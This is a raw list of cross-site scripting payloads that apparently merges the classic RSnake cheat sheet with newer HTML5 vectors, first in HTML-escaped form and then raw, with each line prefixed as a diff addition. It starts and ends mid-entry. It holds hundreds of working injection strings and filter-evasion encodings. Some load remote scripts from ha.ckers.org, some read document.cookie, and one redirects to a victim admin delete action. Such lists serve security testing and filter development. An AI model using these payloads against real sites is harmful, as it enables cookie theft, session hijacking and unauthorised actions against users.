TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;BODY ONLOAD=alert('XSS')&gt; +&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt; +&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;BR SIZE=\"&{alert('XSS')}\"&gt; +&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt; +&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt; +&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt; +&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt; +&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt; +&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt; +&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS +&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt; +&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt; +&lt;IMG 
SRC=\"livescript&#058;&#91;code&#93;\"&gt; +žscriptualert(EXSSE)ž/scriptu +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt; +&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\" +&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt; +&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt; +&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt; +&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt; +&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt; +&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt; +&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt; +&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt; +exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\"); +xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt; +&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt; +&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt; +&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt; +&lt;!--&#91;if gte IE 4&#93;&gt; +&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt; +&lt;!&#91;endif&#93;--&gt; +&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt; +&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt; +&lt;OBJECT 
classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt; +&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt; +a=\"get\"; +b=\"URL(\\"\"; +c=\"javascript&#058;\"; +d=\"alert('XSS');\\")\"; +eval(a+b+c+d); +&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt; +&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt; +&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt; +&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt; +&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt; +&lt;HTML&gt;&lt;BODY&gt; +&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt; +&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt; +&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt; +&lt;/BODY&gt;&lt;/HTML&gt; +&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt; +&lt;!--#exec cmd=\"/bin/echo 
'&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt; +&lt;? echo('&lt;SCR)'; +echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt; +&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt; +Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser +&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt; +&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt; +&lt;A 
HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt; +&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt; +&lt; +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&lt; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C +&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS')\" +&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt; +&lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt; +&lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; +&lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; +&lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt; +perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out +perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out +&lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt; +&lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt; +&lt;IMG 
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; +&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt; +&lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; +&lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt; +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt; +&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt; +&lt;IMG SRC=javascript&#058;alert('XSS')&gt; +&lt;IMG SRC=\"javascript&#058;alert('XSS');\"&gt; +&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; +'';!--\"&lt;XSS&gt;=&{()} +';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascrscriptipt:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> 
+¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION +<form><button formaction="javascript:alert(123)">crosssitespt +<frameset onload=alert(123)> +<!--<img src="--><img src=x onerror=alert(123)//"> +<style><img src="</style><img src=x onerror=alert(123)//"> +<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> +<embed src="javascript:alert(1)"> +<? foo="><script>alert(1)</script>"> +<! 
foo="><script>alert(1)</script>"> +</ foo="><script>alert(1)</script>"> +<script>({0:#0=alert/#0#/#0#(123)})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> +<script src="#">{alert(1)}</script>;1 +<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> +<svg xmlns="#"><script>alert(1)</script></svg> +<svg onload="javascript:alert(123)" xmlns="#"></svg> +<iframe xmlns="#" src="javascript:alert(1)"></iframe> ++ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- ++ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- +%253cscript%253ealert(document.cookie)%253c/script%253e +“><s”%2b”cript>alert(document.cookie)</script> +“><ScRiPt>alert(document.cookie)</script> +“><<script>alert(document.cookie);//<</script> +foo<script>alert(document.cookie)</script> +<scr<script>ipt>alert(document.cookie)</scr</script>ipt> +%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E +‘; alert(document.cookie); var foo=’ +foo\’; alert(document.cookie);//’; +</script><script >alert(document.cookie)</script> +<img src=asdf onerror=alert(document.cookie)> +<BODY ONLOAD=alert(’XSS’)> +<script>alert(1)</script> +"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> +<video src=1 onerror=alert(1)> +<audio src=1 onerror=alert(1)> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" 
+<script/src=data:,alert()> +<marquee/onstart=alert()> +<video/poster/onerror=alert()> +<isindex/autofocus/onfocus=alert()> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; +&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& +#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</script><script>alert('XSS');</script> +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY 
BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*"); +xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV 
STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" +veris-->group<svg/onload=alert(/XSS/)// +#"><img src=M onerror=alert('XSS');> +element[attribute='<img src=x onerror=alert('XSS');> +[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] +%22;alert%28%27RVRSH3LL_XSS%29// +javascript:alert%281%29; +<w contenteditable id=x onfocus=alert()> +alert;pg("XSS") +<svg/onload=%26%23097lert%26lpar;1337)> +<script>for((i)in(self))eval(i)(1)</script> +<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> +<sCR<script>iPt>alert(1)</SCr</script>IPt> +<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> +%253Cscript%253Ealert('XSS')%253C%252Fscript%253E +<IMG 
SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> +<IMG SRC=x 